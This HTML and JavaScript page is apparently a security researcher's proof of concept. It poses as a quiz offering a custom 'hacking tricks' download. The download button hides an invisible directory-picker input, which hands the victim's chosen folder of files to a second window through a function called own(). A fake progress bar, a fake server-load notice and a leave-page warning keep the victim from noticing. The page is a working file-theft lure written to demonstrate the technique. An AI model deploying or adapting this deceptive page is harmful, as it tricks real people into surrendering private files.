<!DOCTYPE html> 
<html> 
<head>
<meta charset=utf-8 />
<title>Hacking tricks</title>
<link href='http://fonts.googleapis.com/css?family=Inconsolata' rel='stylesheet' type='text/css'>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js" type="text/javascript"></script>  
<script src="ProgressBar.js" type="text/javascript"></script>
<style>
body {background: #333; color: #eee; font-family: 'Inconsolata', Verdana, sans-serif;}
a:link, a:visited {color: lightgreen;} 
input[type='file'] {
  opacity: 0;
  position: absolute;
  left: 0;
  top: 0;
  width: 300px;
  line-height: 20px;
  height: 25px;  
}
#cloak {
  position: absolute;
  left: 0;
  top: 0;
  line-height: 20px;
  height: 25px;
}

label {
display: block;
}

#download>div {
	position: relative;
}

#download {
	display: none;
}
#progress {
    margin-top: 30px;
    display: none;
}
#progress>div {
    position: relative;
    width: 500px;
    border: 1px solid black;
    height: 20px;
    overflow: hidden;
}
#p {
    position: absolute;
    top: 0;
    left: -100px;
    height: 20px;
    background: darkgreen;
    width: 100px;
}

</style> 
</head> 
<body>
<h1>Download custom-built hacking tricks</h1>
<h2>Built on-demand just for you!</h2>
<p>by <a rel="me" href="http://blog.kotowicz.net">Krzysztof Kotowicz</a> | <a href="http://blog.kotowicz.net/2011/04/how-to-make-file-server-from-your.html">more info</a></p>
<p>I've got some gifts for you. I gathered some of the latest hacking tricks for all browsers, spiced it up with an algorithm that will send you a ZIP file crafted especially for you based on your answers. Just fill out the short quiz and wait for the file download.</p>
<ol>
 <li>Your nickname: <input></li>
 <li>Choose techniques to include: 
   <label><input type=checkbox>SQL injection</label>
   <label><input type=checkbox>XSS</label>
   <label><input type=checkbox>CSRF</label>      
   <label><input type=checkbox>Clickjacking</label>   
   <label><input type=checkbox>APT</label>   
 </li>
 <li>Who's the greatest of them all?
     <label><input type=radio name=q>HBGary</label>
     <label><input type=radio name=q>lcamtuf</label>
     <label><input type=radio name=q>kevin mitnick</label>
 </li>
 <li>Browser you're targetting
     <label><input type=radio name=q2>chrome</label>
     <label><input type=radio name=q2>msie</label>
     <label><input type=radio name=q2>firefox</label>
     <label><input type=radio name=q2>opera</label>
     <label><input type=radio name=q2>other webkit based (android, safari, ...)</label>
     <label><input type=radio name=q2>other</label>          
 </li>
 <li><label><input type="checkbox" name=agree>I will only use the techniques mentioned in the book for legitimate purposes.</label></li> 
 <li id=download>Choose download location
<div>
<button id=cloak>Download to...</button>
<input type="file" id="file_input" webkitdirectory directory />
</div> 
</li>
</ol> 

<div id="progress">
<p>Preparing file for download...</p>
<div>
<div id="p"></div>
</div>
<p style="color: yellow">Note: We're experiencing high loads now, please be patient...</p>
<p>Meanwhile, why don't you read the rest of <a target="_blank" href="http://blog.kotowicz.net/2011/04/how-to-make-file-server-from-your.html">the article</a>?
</p>
</div>

<script>
//animation
var targetWin;

if (typeof FormData == 'undefined') {
	$('ol').before('<p>Sorry, your browser is unsupported, try Chrome.</p>').remove();
}

$('input[name=agree]').change(function(){
    $('#download').toggle(this.checked);
}); 

$('#file_input').change(function(e) {
	(new ProgressBar()).start();
	$("#cloak,#file_input").attr('disabled', 'disabled');
	try {
	targetWin.own(e.target.files);
	$("#cloak,#file_input").remove();
	} catch(e) {}
}).click(function() {
	   if (!targetWin || targetWin.closed || typeof targetWin.own == 'undefined') {
           targetWin = window.open('dl.html');
	   }
	   window.focus(); // focus back to us
});

window.onbeforeunload = function() { return "Are you sure you want to cancel the download? The file is partially downloaded, it might get corrupt.";}
</script> 
</body> 
</html> 
